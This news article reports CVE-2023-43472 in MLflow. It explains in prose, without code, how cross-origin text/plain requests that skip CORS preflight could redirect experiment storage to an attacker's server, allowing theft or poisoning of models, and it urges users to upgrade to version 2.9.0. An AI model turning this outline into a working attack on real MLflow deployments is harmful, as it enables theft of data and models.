HomeWinBuzzer NewsNew MLflow Update Prevents Theft and Poisoning of Machine Learning Models

New MLflow Update Prevents Theft and Poisoning of Machine Learning Models

A critical flaw in MLflow (CVE-2023-43472) let hackers steal or mess with your data. Attackers could redirect training data and "poison" models.

-

A significant security flaw in MLflow, the widely used open-source lifecycle platform, has been addressed, making it essential for users to upgrade to the latest version. The vulnerability, identified as CVE-2023-43472, permitted unauthorized individuals to steal or tamper with sensitive machine learning training data. This could occur if a developer accessed an external website from the same machine operating MLflow. The patch for this flaw is included in MLflow version 2.9.0.

Understanding the Security Risk

Hosted on a computer's localhost, MLflow's user interface is available by default at this location, equipped with a REST API that facilitates programmable interactions. Under normal circumstances, such API interactions involve POST requests leveraging the ‘application/JSON' content type. However, an investigation by Joseph Beeton, a senior application security researcher at Contrast Security, revealed that MLflow's API did not verify the content type of incoming requests, thus exposing it to text/plain content type requests initiated by remote cross-origin JavaScript code without triggering CORS preflight checks.

Attackers exploited this oversight to rename the “Default” experiment in MLflow and point new experiment data to an external server under the attacker's control. Such a breach enabled the extraction of the trained machine learning model and its underlying data. More alarmingly, an adversary could manipulate the training process by introducing malicious data, resulting in a “poisoned” model that behaved unpredictably or in a manner beneficial to the attacker.

Addressing The Exploit and Ensuring Best Practices

To rectify the security gap, the MLflow developers have implemented necessary checks within the platform to validate content types of API requests, thereby mitigating the risk of unauthorized cross-origin requests. Further, to combat potential remote code execution threats arising from exploiting such vulnerabilities, developers are urged to update their MLflow installations to version 2.9.0 or later immediately.

Given the serious implications of such vulnerabilities for machine learning systems, which often form an integral part of business processes, maintaining robust security measures is paramount. Users are encouraged to consistently apply updates and patches to their software and stay informed about security best practices. Additionally, organizations deploying machine learning models should ensure that robust security policies are in place to protect against the theft or corruption of these highly valuable assets.

Luke Jones
Luke Jones
Luke has been writing about all things tech for more than five years. He is following Microsoft closely to bring you the latest news about Windows, Office, Azure, Skype, HoloLens and all the rest of their products.

Recent News